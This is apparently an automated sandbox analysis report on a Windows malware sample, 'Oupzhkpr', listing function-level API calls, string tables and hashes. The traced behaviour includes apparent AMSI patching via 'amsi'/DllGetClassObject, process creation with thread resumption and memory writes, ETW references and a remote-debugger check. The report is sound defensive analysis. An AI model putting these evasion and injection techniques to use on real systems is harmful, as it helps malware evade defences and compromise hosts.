                                                                                                                                         [Graph of the function starting at 02E3786F (basic blocks 2e3786f through 2e3aa1d), rendered by the interactive viewer; the textual graph dump is omitted here. Recoverable content: the blocks consist almost entirely of repeated calls to the helper routines 02E1480C, 02E1494C, 02E146A4 and 02E14798 followed by the GetModuleHandle/GetProcAddress resolver 02E2881C; the remaining notable edges are the API calls CreateProcessAsUserW and ExitProcess and calls into 02E2DAC4 (the RtlDosPathNameToNtPathName_U/NtWriteFile/NtClose routine listed above) and 02E2CF9C, 02E2DC88, 02E28BA8, 02E27B90, 02E28184, 02E2E538 and 02E17E10.]
2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c ResumeThread call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c CloseHandle call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e27ecc call 2e28798 * 6 CloseHandle call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c 5676->5990 5991 2e382ea-2e382fc call 2e2857c 5676->5991 5822->5555 5823->5822 5990->5465 5991->5990
APIs
  • Part of subcall function 02E2881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02E28903), ref: 02E28860
  • Part of subcall function 02E2881C: GetProcAddress.KERNEL32(02E71384,00000000), ref: 02E28879
  • Part of subcall function 02E2881C: FreeLibrary.KERNEL32(02E71384,00000000,02E71388,Function_000055D8,00000004,02E71398,02E71388,000186A3,00000040,02E7139C,02E71384,00000000,00000000,00000000,00000000,02E28903), ref: 02E288E3
• CreateProcessAsUserW.ADVAPI32(02F657D8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02F657DC,02F65820,OpenSession,02E6CF00,02E3AFD0,UacScan,02E6CF00), ref: 02E37E31
• ResumeThread.KERNEL32(02F65824,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,UacScan,02E6CF00,02E3AFD0,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0), ref: 02E3847B
• CloseHandle.KERNEL32(02F65820,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,UacScan,02E6CF00,02E3AFD0,02F65824,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00), ref: 02E385FA
  • Part of subcall function 02E28798: LoadLibraryW.KERNEL32(?,?), ref: 02E287AC
  • Part of subcall function 02E28798: GetProcAddress.KERNEL32(02E71390,BCryptVerifySignature), ref: 02E287C6
  • Part of subcall function 02E28798: FreeLibrary.KERNEL32(02E71390,02E71390,BCryptVerifySignature,bcrypt,?,02E713D0,00000000,02E713A4,02E2A3BF,ScanString,02E713A4,02E2A774,ScanBuffer,02E713A4,02E2A774,Initialize), ref: 02E28802
• CloseHandle.KERNEL32(02F65820,02F65820,ScanBuffer,02E6CF00,02E3AFD0,UacInitialize,02E6CF00,02E3AFD0,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,UacScan,02E6CF00), ref: 02E389EC
  • Part of subcall function 02E2DAC4: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02E2DB03
  • Part of subcall function 02E2DAC4: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02E2DB6A
  • Part of subcall function 02E2DAC4: NtClose.NTDLL(?), ref: 02E2DB73
  • Part of subcall function 02E28184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02E2820E), ref: 02E281F0
• ExitProcess.KERNEL32(00000000,OpenSession,02E6CF00,02E3AFD0,ScanBuffer,02E6CF00,02E3AFD0,Initialize,02E6CF00,02E3AFD0,00000000,00000000,00000000,ScanString,02E6CF00,02E3AFD0), ref: 02E3AA1D
Memory Dump Source
• Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
Similarity
• API ID: CloseHandleLibrary$AddressFreePathProcProcess$CacheCreateExitFileFlushInstructionLoadModuleNameName_ResumeThreadUserWrite
• String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
• API String ID: 4004194653-1225450241
• Opcode ID: f9f0b7dacfad9f4334a1473d813c9d512d2094f2f4536cc388ad01dd7a56f4d8
• Instruction ID: 746e8ac5a0c705dc9fc30368749b31cd23aa677c65779e174d7e8ccf8e90ef15
• Opcode Fuzzy Hash: f9f0b7dacfad9f4334a1473d813c9d512d2094f2f4536cc388ad01dd7a56f4d8
• Instruction Fuzzy Hash: B543F975A801988BDB12EB65DD849DE73F6AF84305F64E0F5F04AA7358DA30AE85CF10

Control-flow Graph

Control-flow graph of the function at 2e11727 (graph dump omitted; Windows API calls reached along its paths: VirtualAlloc, Sleep).
APIs
• Sleep.KERNEL32(00000000), ref: 02E117D0
• Sleep.KERNEL32(0000000A,00000000), ref: 02E117E6
Memory Dump Source
• Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 617f3fe2d34bf5c9dc2ebc08b66ff026a0e6922232ae8bb4e3e0abc0fbb7f2ff
• Instruction ID: 8cd16a91a172eb09fd38cd6260772a66efd772dc2b15a30f669a24a5534747a0
• Opcode Fuzzy Hash: 617f3fe2d34bf5c9dc2ebc08b66ff026a0e6922232ae8bb4e3e0abc0fbb7f2ff
• Instruction Fuzzy Hash: E0B13176A803418BDB05CF29D488796BBE1EB85354F4CC679E61D8F3C4C370A891CB90

Control-flow Graph

Control-flow graph of the function at 2e28798 (graph dump omitted; Windows API calls reached along its paths: LoadLibraryW, GetProcAddress, FreeLibrary).
APIs
• LoadLibraryW.KERNEL32(?,?), ref: 02E287AC
• GetProcAddress.KERNEL32(02E71390,BCryptVerifySignature), ref: 02E287C6
• FreeLibrary.KERNEL32(02E71390,02E71390,BCryptVerifySignature,bcrypt,?,02E713D0,00000000,02E713A4,02E2A3BF,ScanString,02E713A4,02E2A774,ScanBuffer,02E713A4,02E2A774,Initialize), ref: 02E28802
  • Part of subcall function 02E27CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E27D6C
Memory Dump Source
• Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
Similarity
• API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
• String ID: BCryptVerifySignature$bcrypt
• API String ID: 1002360270-4067648912
• Opcode ID: b9e353f0d2068382d0e6f0ef6fe4fc5f2270a42c81b0920e0a45bbf0373be00c
• Instruction ID: 79ea8b27887ba5a3ae2a3f9d23987a5c7ba64f80d9b16c459332380c5bddf33b
• Opcode Fuzzy Hash: b9e353f0d2068382d0e6f0ef6fe4fc5f2270a42c81b0920e0a45bbf0373be00c
• Instruction Fuzzy Hash: 4CF0C271AC03247EFB10EB6AA845FB6379CA38435CF42593AB10D8F540C7B0089CCB60

Control-flow Graph

APIs
• LoadLibraryW.KERNEL32(amsi), ref: 02E2870D
  • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E28113
  • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(?,?), ref: 02E28125
  • Part of subcall function 02E27CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E27D6C
• FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02E2876C
Memory Dump Source
• Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
Similarity
• API ID: AddressLibraryProc$FreeLoadMemoryVirtualWrite
• String ID: DllGetClassObject$W$amsi
• API String ID: 2980007069-2671292670
• Opcode ID: 8df2b6713553709b91bb66bf7e0e5a7367bbeb9a64d6a610df56841c6857d53c
• Instruction ID: 058bbc59f4ad373ee6909bdccbd1896c4b1c740a46224b84a4a39aeb45087c05
• Opcode Fuzzy Hash: 8df2b6713553709b91bb66bf7e0e5a7367bbeb9a64d6a610df56841c6857d53c
• Instruction Fuzzy Hash: F9F0C26048C381B9E200E6788C45F4FBFCE4B92224F04DE1CB1E99A2D2D679D108CBB7

Control-flow Graph

Control-flow graph of the function at 2e2ebe8 (graph dump omitted; Windows API calls reached along its paths: GetModuleHandleW, GetProcAddress, CheckRemoteDebuggerPresent).
APIs
• GetModuleHandleW.KERNEL32(KernelBase), ref: 02E2EBF8
• GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02E2EC0A
• CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02E2EC21
Memory Dump Source
• Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
Similarity
• API ID: AddressCheckDebuggerHandleModulePresentProcRemote
• String ID: CheckRemoteDebuggerPresent$KernelBase
• API String ID: 35162468-539270669
• Opcode ID: 9f6d8b48ee23ef59c18e42033bade6ec20d634f33e62a6efc193e3a6723b5f51
• Instruction ID: e3d4aa30c1a68b81705204efbb11b0a17a68fce880bc3d52913e3a5952bef69c
• Opcode Fuzzy Hash: 9f6d8b48ee23ef59c18e42033bade6ec20d634f33e62a6efc193e3a6723b5f51
• Instruction Fuzzy Hash: 6AF027709442BCAED702A7E8888A7DCFBA94B05328F28A790A026710C0E7702648C650

                                                                                                                                        Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 02E11B17
                                                                                                                                        • Sleep.KERNEL32(0000000A,00000000), ref: 02E11B31
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                        • Opcode ID: 4beeb67d0b7bf5e00a1f47504e0f7226d9d02c1da8095370e849a71a3bc3549d
                                                                                                                                        • Instruction ID: f163ce2f99eb7fe26dc5f2a081ec9b2af1ea978cd016bc76c2b1f1b91f6527e9
                                                                                                                                        • Opcode Fuzzy Hash: 4beeb67d0b7bf5e00a1f47504e0f7226d9d02c1da8095370e849a71a3bc3549d
                                                                                                                                        • Instruction Fuzzy Hash: C051C0756803408FEB15CF69C988B96BBD0AB45318F58D5BEE64CCF2C2E7709885CB91
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02E28903), ref: 02E28860
                                                                                                                                        • GetProcAddress.KERNEL32(02E71384,00000000), ref: 02E28879
                                                                                                                                          • Part of subcall function 02E27CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E27D6C
                                                                                                                                        • FreeLibrary.KERNEL32(02E71384,00000000,02E71388,Function_000055D8,00000004,02E71398,02E71388,000186A3,00000040,02E7139C,02E71384,00000000,00000000,00000000,00000000,02E28903), ref: 02E288E3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressFreeHandleLibraryMemoryModuleProcVirtualWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3588955079-0
                                                                                                                                        • Opcode ID: 914816a10446a0dd496002b1646178e861237bde7c5753dbd4fa42c845fc4933
                                                                                                                                        • Instruction ID: b75cc37e3bd4b9e5b118a8d126a7b67d75ecffe1f534fdad088cfb973807009f
                                                                                                                                        • Opcode Fuzzy Hash: 914816a10446a0dd496002b1646178e861237bde7c5753dbd4fa42c845fc4933
                                                                                                                                        • Instruction Fuzzy Hash: CE114270AC0344BFEB00FBB8CD02A5E77A99B45700F92E4747509ABA80DA7499048B24
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: cf40e180b550bf439c5dc872ef8f6c75c3113a25bbc2484cdf75f10915deff7a
                                                                                                                                        • Instruction ID: 67583341c2487a89e38fdc6a3aa888dbb5e1ad014e9b60618d1fe145eb16d84d
                                                                                                                                        • Opcode Fuzzy Hash: cf40e180b550bf439c5dc872ef8f6c75c3113a25bbc2484cdf75f10915deff7a
                                                                                                                                        • Instruction Fuzzy Hash: A3415B75DC02049FDB64EF29E48879A7BE2FB05319F98E469E9089B380C73098D5CF61
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(20D81B20,?,00000105), ref: 02E15832
                                                                                                                                          • Part of subcall function 02E15A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02E15A94
                                                                                                                                          • Part of subcall function 02E15A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E15AB2
                                                                                                                                          • Part of subcall function 02E15A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E15AD0
                                                                                                                                          • Part of subcall function 02E15A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02E15AEE
                                                                                                                                          • Part of subcall function 02E15A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02E15B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02E15B37
                                                                                                                                          • Part of subcall function 02E15A78: RegQueryValueExA.ADVAPI32(?,02E15CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02E15B7D,?,80000001), ref: 02E15B55
                                                                                                                                          • Part of subcall function 02E15A78: RegCloseKey.ADVAPI32(?,02E15B84,00000000,00000000,00000005,00000000,02E15B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E15B77
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2796650324-0
                                                                                                                                        • Opcode ID: 8d2262c70beaae2bbfdede8a2f275eb551cfb6ca49d82510be69373b1f735333
                                                                                                                                        • Instruction ID: df581d72abc7ee7fbedf0c696ee37cef0317cb89c81d3144579567c2a45dc764
                                                                                                                                        • Opcode Fuzzy Hash: 8d2262c70beaae2bbfdede8a2f275eb551cfb6ca49d82510be69373b1f735333
                                                                                                                                        • Instruction Fuzzy Hash: DAE06D71A402148BCB10DE5888C4B5637D8AB48754F409575ED68DF34AD371D9108BE0
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,02E32A41,ScanString,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,Initialize), ref: 02E17E3F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: fe3f8c7547375d3b190e2bd7b8d67a4577ec7d15bc45dec9ccb4955a6e8d04a7
                                                                                                                                        • Instruction ID: dcd72dcf2ee2bcd86c7bc6a0dce62b1b1ed4e41669b2965baf93050c45c07b04
                                                                                                                                        • Opcode Fuzzy Hash: fe3f8c7547375d3b190e2bd7b8d67a4577ec7d15bc45dec9ccb4955a6e8d04a7
                                                                                                                                        • Instruction Fuzzy Hash: E5C08CF02922080E5E50A2FC0CC454A42CC090463C3A4BF75F13AC62D2D322D8922410
                                                                                                                                        APIs
                                                                                                                                        • timeSetEvent.WINMM(?,00000000), ref: 02E3BB58
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Eventtime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2982266575-0
                                                                                                                                        • Opcode ID: e91b6b12a47a8cbb46c267045385499a43cf3b1db0d4ffa743b02d1c94bddf1b
                                                                                                                                        • Instruction ID: 367dcafacfe1ae972f2cd8176fd2ada55f0bf74ff907b56b86e3ac89ce1518a5
                                                                                                                                        • Opcode Fuzzy Hash: e91b6b12a47a8cbb46c267045385499a43cf3b1db0d4ffa743b02d1c94bddf1b
                                                                                                                                        • Instruction Fuzzy Hash: 01C092F07C13803EFA10A6F81CD6FA3A58DD308B01F606426BA05FE2C2D5E24C50CA20
                                                                                                                                        APIs
                                                                                                                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02E14BEB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2525500382-0
                                                                                                                                        • Opcode ID: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
                                                                                                                                        • Instruction ID: 4c1f32e49bfe9603772b22c0001469684871ef3cadcb6268510730823635ec74
                                                                                                                                        • Opcode Fuzzy Hash: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
                                                                                                                                        • Instruction Fuzzy Hash: DBB092782C821218EA5421610D10FF2008C0B5138EF84B0B1AF28C82C0FB04C0009832
                                                                                                                                        APIs
                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 02E14C03
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3341692771-0
                                                                                                                                        • Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                                        • Instruction ID: 3bcfccf4028db1e21f79a4918be0acb2458f2574aa5b7c5c634819209074e11a
                                                                                                                                        • Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                                        • Instruction Fuzzy Hash: D4A011BC0802020AAA0B2228000002A20322EE038838AE0B82A080A0808A2A8000E830
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02E116A4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: edad90bf4e066039eee6b53d4f16b788e784c882516c8e12bb0eb3578c57ddee
                                                                                                                                        • Instruction ID: e0ec520e8118dab7c2f40dcbe036dbe3f147b5e7eeb300ef7f274e96f55476c2
                                                                                                                                        • Opcode Fuzzy Hash: edad90bf4e066039eee6b53d4f16b788e784c882516c8e12bb0eb3578c57ddee
                                                                                                                                        • Instruction Fuzzy Hash: F7F09AB2A807956BD710EE5ADC80B82BB94FB00325F458139FA4C9B340D770A854CBD4
                                                                                                                                        APIs
                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02E11704
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                        • Opcode ID: a1e1e40abe88de422cad60f7fa28db27261920487047f7d6d9706fee6581534a
                                                                                                                                        • Instruction ID: 87bc3f450055d002a5caf1bf956a4480715b762fa04e04d8a1edf4c8ef6ff699
                                                                                                                                        • Opcode Fuzzy Hash: a1e1e40abe88de422cad60f7fa28db27261920487047f7d6d9706fee6581534a
                                                                                                                                        • Instruction Fuzzy Hash: CCE0DF713803006FE7109A3D4C407126AC8AF45224F249575F208CF2C1D2A0D8008B24